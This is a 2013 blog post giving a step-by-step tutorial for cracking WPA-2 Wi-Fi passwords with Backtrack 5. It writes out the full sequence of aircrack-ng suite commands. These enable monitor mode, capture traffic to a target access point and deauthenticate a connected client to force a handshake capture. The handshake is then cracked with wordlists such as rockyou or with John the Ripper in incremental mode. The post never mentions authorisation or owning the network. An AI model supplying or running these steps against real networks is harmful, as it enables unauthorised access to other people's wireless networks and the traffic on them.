Pages

Sunday, July 28, 2013

Cracking WPA-2



Cracking WPA-2 WI-FI using Backtrack 5.


 Main requirement : Backtrack OS

Note:  You must use a bootable pen drive with backtrack or a dedicated backtrack machine.



# STEP 1

  iwconfig. 


#STEP 2 

  airmon-ng start wlan0


#STEP 3

airodump-ng mon0
#STEP 4
airodump-ng --bssid 20:64:34:40:32:B4 -c 6 -w /tmp/wpacrack mon0 
 20:64:34:40:32:B4 is aMAC address

 


#STEP 5 
:
open new terminal and type: aireplay-ng -0 1 -a 20:64:34:40:32:B4 -c 78:DD:08:CD:60:0C mon0

here 78:DD:08:CD:60:0C is MAC of the client.  once a WPA handshake is captured the output would be like the following screenshot.
#STEP 6
Now all the capturing part is over.. in new terminal type:
ls /tmp/wpacrack* -al
#STEP 7 
Now the actual cracking takes place.you can close all the other terminals. The .cap is the one that we have to crack. for this we use aircrack-ng. there are two ways of doing this.  
1) executes quite fast but doesnt have a very high success rate. although basic passwords can be cracked by this. WPA/WPA2 cracking is as good as the dictionary you are using. Backtrack supplies some dictionaries but this might not be sufficient. some dictionaries are: "darc0de.lst", "rockyou.txt". you can find these files by typing : locate darc0de. in place of darc0de you can type whichever dictionary you want to find. you can also use custom made dictionaries. only if the passphrase is present in the dictionary the password will be cracked.
code:  aircrack-ng /tmp/wpacrack-01.cap -w /pentest/passwords/wordlists/darkc0de.lst
2) John the Ripper. this is another method. this method has much more success ratio.. however this method can take hours to days to months . it is a very time consuming. the cracking depends on your hardware and the strength of the key.you can locate the john file as mentioned before
code: /pentest/password/john/john --stdout --incremental:all | aircrack-ng -b 20:64:34:40:32:B4 -w - /tmp/wpacrack-01.cap
Since you are not sure as to in which file that passphrase may be, you can run the above different aircrack-ng command in differnt terminals with different file names.
Now, after the cracking,,the screen would be as the following screenshot.

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)